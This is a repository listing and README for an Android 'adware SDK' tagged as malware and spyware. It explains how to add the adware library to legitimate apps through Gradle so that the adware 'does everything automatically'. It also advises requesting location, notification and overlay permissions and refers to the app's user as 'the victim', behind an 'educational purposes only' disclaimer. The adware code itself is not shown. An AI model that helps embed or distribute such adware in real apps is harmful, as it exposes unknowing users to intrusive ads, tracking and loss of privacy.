https://github.com/ishacker003/addroid_adware_sdk
[EDUCATIONAL PURPOSES ONLY] Easily build adware apps with the AdDroid adware SDK
https://github.com/ishacker003/addroid_adware_sdk
admob ads adware android android-library malware penetration-testing spyware
Last synced: 4 months ago
JSON representation
[EDUCATIONAL PURPOSES ONLY] Easily build adware apps with the AdDroid adware SDK
- Host: GitHub
- URL: https://github.com/ishacker003/addroid_adware_sdk
- Owner: IsHacker003
- License: gpl-3.0
- Created: 2025-10-03T14:18:21.000Z (8 months ago)
- Default Branch: master
- Last Pushed: 2025-12-31T11:30:26.000Z (5 months ago)
- Last Synced: 2026-01-01T10:15:54.550Z (5 months ago)
- Topics: admob, ads, adware, android, android-library, malware, penetration-testing, spyware
- Language: Kotlin
- Homepage:
- Size: 102 KB
- Stars: 4
- Watchers: 0
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# AdDroid adware SDK
This is an SDK for [AdDroid adware](https://github.com/IsHacker003/AdDroid_adware_standalone), which helps to integrate the adware into legitimate apps for penetration testing purposes.
## Compilation
Your app needs to have minSdk >= 23 to use this SDK. Just add the dependency, the adware will do everything automatically.
For `build.gradle`:
```
implementation (project(path: ":AdDroid-adware")) {
transitive = true
}
```
For `build.gradle.kts`:
```
implementation(project(":AdDroid-adware")) {
transitive = true
}
```
Also add this in `settings.gradle`:
```
include ':AdDroid-adware'
```
Optionally, your app should request location, notification and display over other apps permissions. If you do not request these permissions, the victim will have to manually grant them from the app info.
**For educational purposes only. Do not use for illegal purposes.**